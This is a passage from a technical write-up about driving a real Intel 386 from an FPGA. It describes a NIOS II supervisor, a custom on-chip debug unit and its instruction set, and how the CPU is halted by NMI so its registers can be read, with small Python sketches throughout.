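    words = [int.from_bytes(data[i:i + step].ljust(step, b"\0"), "little")
             for i in range(0, len(data), step)]
    lines = [f"DEPTH = {len(words)};", f"WIDTH = {width};",
             "ADDRESS_RADIX = HEX;", "DATA_RADIX = HEX;", "CONTENT", "BEGIN"]
    # One "address : value;" line per memory word.
    lines += [f"{addr:04X} : {word:0{width // 4}X};"
              for addr, word in enumerate(words)]
    lines.append("END;")
    return "\n".join(lines) + "\n"

print(to_mif(b"\xEA\x00\x80"))
```

Linking several object files then amounts to concatenating them at the right offsets before the conversion.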

Providing debug facilities

Even though Altera's FPGAs provide an efficient internal signal analyser thanks
to SignalTap, it is a real pain to debug software when the size
of the applications running on the 386 becomes significant. Adding a flexible
on-chip debug facility based on UART communication to this design is one of
the main challenges of this project.

Supervisor

The supervisor is designed using Altera's QSys tool, which assists the creation
of systems based on the NIOS II soft-processor. This system is composed of a
private on-chip memory which contains NIOS instructions and data, and of a
UART which is connected to the FT230X chip.

The protocol between the host and the supervisor is pretty simple and it
considers that the CPU is at any time in one of these states :

STOP : CPU is stopped. RESET signal is asserted.

RUN : CPU is running.

IORD / IOWR : CPU is trying to access IO ports. Read and write operations
are distinguished. Those states are used to allow
device emulation.

It makes sense to implement the protocol logic in NIOS software instead
of having it hardwired in Verilog. However, directly handling 386 signals on
the NIOS is inefficient due to the execution speed of this system. The idea here
is to delegate the 386 signal handling job to another module dedicated to it :
the On-Chip Debug Unit.

The OCD Unit can take control of the 386 buses at any time by asserting the
ocd.en signal, which disables the original bus controller described before.
The communication between those two units is ensured by a dual-port shared
memory accessible through the Avalon bus and two PIO registers. The first one,
OCD_CTL, is used to reset the OCD Unit from the supervisor. The second,
OCD_STATUS, indicates if the unit is running or not. The shared memory
contains a routine that must be applied to the 386.

On-Chip Debug Unit

This unit is basically a processor specially designed to handle 386 signals.
It fetches its instructions from the 256 x 16-bit Avalon memory filled by the
supervisor and operates on a 16 x 16-bit data space also located on shared
memory.

While the supervisor can access OCD program and data without restriction, the
OCD Unit can only operate on its data space, which corresponds to offset
0x100 from the supervisor's point of view. In the dedicated assembler, data memory
is addressed using the R1 to R15 naming convention.

Implementing this kind of processor is quite simple and a basic one will be
based on the following state machine :

As Avalon memory signals are always latched, reading on it takes two clock
cycles : the first cycle is used to latch the address value and the second one
latches the result on the data bus. Taking that into account, execution of a
single instruction which reads and writes on data memory cannot take less than
five clock cycles.

STORE : Store result and compute next address of the next instruction.

LATCH : Latch instruction address into program memory.

Instruction set is composed of several categories. The first one is used to
control the OCD :

ATTACH/DETACH : Connect/Disconnect the OCD unit to 386 signals.

The second category includes instructions related to 386 signals processing :

LDD d : Load data bus value into d register.

LDAL d / LDAH d : Load address bus value into d register.

LDWR d : Load W/R# signal into d register.

LDDC d : Load D/C# signal into d register.

LDMIO d : Load M/IO# signal into d register.

STD s : Set data bus value to s register value.

START/RESET : Start/Reset the CPU.

READY : Assert READY# signal.

Of course, some instructions only operate on registers :

LDI d, imm16 : Load a 16-bit immediate into d register.

MOV d, s : Move s register value into d register.

CLR d : Clear d register.

The third category is about flow control. As the data memory only exposes one port
to the OCD Unit, implementing a compare instruction which loads two
registers is not possible in a single cycle. So a compare register has been
added to the core. All comparisons are made against that register.

LDCMP s : Load s register value into the compare register.

CMP s : Compare s register value with compare register value and store
the result into the compare register.

BA/BEQ/BNE addr : Branch to the specified address according to
compare register value.

As an example, these instructions perform a jump to label if R1 is equal to R2 :
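The original listing is not reproduced here. The behaviour of the compare register can nevertheless be modelled with a tiny Python interpreter for a subset of the instructions above. The tuple syntax, the use of list indices as branch targets and the encoding of the comparison result (1 when equal) are assumptions made for this sketch:

```python
def run(program, regs):
    """Interpret a subset of the OCD flow-control instructions.

    program is a list of tuples such as ("CMP", "R2"); branch targets are
    indices into that list. regs maps register names to 16-bit values.
    """
    pc, cmp_reg = 0, 0
    while pc < len(program):
        op, *args = program[pc]
        pc += 1
        if op == "LDI":
            regs[args[0]] = args[1] & 0xFFFF
        elif op == "LDCMP":
            cmp_reg = regs[args[0]]
        elif op == "CMP":
            cmp_reg = int(regs[args[0]] == cmp_reg)  # assumed result encoding
        elif op == "BA" or (op == "BEQ" and cmp_reg) or (op == "BNE" and not cmp_reg):
            pc = args[0]
    return regs

jump_if_equal = [
    ("LDCMP", "R1"),   # compare register <- R1
    ("CMP", "R2"),     # compare register <- (R2 == compare register)
    ("BEQ", 4),        # jump to "label" when they were equal
    ("LDI", "R3", 0),  # executed only when R1 != R2
    ("LDI", "R4", 1),  # label
]
print(run(jump_if_equal, {"R1": 5, "R2": 5, "R3": 7, "R4": 0}))
```

Two instructions are needed before the branch because only one register can be read from the data memory per instruction.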

This wait state mechanism is also used to implement instructions used to wait
for a particular event on the bus. All those instructions deassert READY#
signal and attach the OCD to the 386 when the expected condition is
triggered.

WAITADS : Wait for ADS# signal to be asserted

WAITIO : Wait for ADS# and M/IO# getting low

WAITLOCK : Wait for ADS# and LOCK# to be asserted

The block diagram of this unit can be represented as :

Here are the routines used to reset and start the CPU from the OCD Unit. Notice
that the start routine lets the original bus controller operate on the 386 until
an IO access is performed. The supervisor just has to be interrupted when the
OCD exits from the start routine to handle the IO request. Devices can
then be emulated by the supervisor or by the host.

Example : Obtaining CPU registers

Now that the OCD Unit internals have been presented, the purpose now is to use
it to get CPU registers.

Before applying debug operations on the CPU, it is necessary to stop execution
and set it up in a known state. The simplest method to interrupt a 386
without having to worry about the interrupt flag is to send a Non
Maskable Interrupt. Unlike the INTR signal, the NMI mechanism does not provide any
acknowledge from the CPU. So the only way to know if the CPU actually took the
NMI into account is to wait for the LOCK# signal assertion. Indeed, the 386 locks
the whole bus when it accesses an IDT or IVT entry. The WAITLOCK
instruction has been designed for that specific purpose.

On the next step, the behaviour of the CPU is different according to its mode.
If the 386 is still in real mode, it will fetch the code segment and the
offset of the NMI handler located on the Interrupt Vector Table. As IVT
always starts at 0x0000000, the address 0x0000008 will be outputted after
triggering the NMI.

On the other hand, if protected mode is enabled, the CPU will fetch the
Interrupt Descriptor corresponding to the NMI. This structure is
located in the Interrupt Descriptor Table, which can be found anywhere in the
address space.

As the processor mode is unknown at that moment, it can be deduced from the
first requested address after NMI :
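The original routine is not reproduced here. The underlying reasoning can be sketched in Python: the NMI is vector 2, real-mode vectors are 4 bytes long and protected-mode gate descriptors are 8 bytes long. The helper names are made up, and the guess assumes that the real-mode table has not been relocated:

```python
NMI_VECTOR = 2

def real_mode_vector_address(vector=NMI_VECTOR):
    """Address of an IVT entry: 4 bytes (offset, segment) per vector from 0."""
    return 4 * vector

def protected_mode_descriptor_address(idt_base, vector=NMI_VECTOR):
    """Address of an IDT gate: 8 bytes per vector from the IDT base."""
    return idt_base + 8 * vector

def guess_mode(first_address):
    """Deduce the CPU mode from the first address requested after the NMI."""
    if first_address == real_mode_vector_address():
        return "real"
    return "protected"

print(guess_mode(0x000008), guess_mode(protected_mode_descriptor_address(0xF8800)))
```

Here 0xF8800 is only a made-up IDT base used for the demonstration.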

Finally, as the EFLAGS, EIP and CS registers have been modified, they are
pushed on the stack. However, the bus controller is disconnected from the CPU
signals : this means that no actual write to memory is performed during
this operation. Instead, it is straightforward to load those values into OCD
registers :

Afterwards, the CPU will try to fetch instructions from the interrupt handler.
So HOLD signal is asserted at the end of the break routine. This leaves the
supervisor time to load the next routine to the OCD program memory.

At this point, the 386 is in a known and valid state which allows us to inject
any instruction sequence. In order to obtain the CPU registers, the pusha
instruction can be injected :
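The injection routine itself is not reproduced here. Once the write cycles generated by the instruction have been captured, the values only need to be named. The sketch below assumes that the 32-bit form of the instruction was executed and that the captured 16-bit bus writes have already been reassembled into 32-bit values, in the order in which they were pushed:

```python
# Order in which PUSHAD pushes the registers; ESP is the value before the push.
PUSHAD_ORDER = ("EAX", "ECX", "EDX", "EBX", "ESP", "EBP", "ESI", "EDI")

def decode_pushad(values):
    """Name the eight values captured on the bus during a PUSHAD."""
    if len(values) != len(PUSHAD_ORDER):
        raise ValueError("PUSHAD pushes exactly eight registers")
    return dict(zip(PUSHAD_ORDER, values))

captured = [0x11111111, 0x22222222, 0x33333333, 0x44444444,
            0x0000FFF0, 0x55555555, 0x66666666, 0x77777777]  # made-up values
print(decode_pushad(captured))
```

As with the registers pushed by the NMI, nothing is actually written to memory: the OCD Unit only observes the data bus.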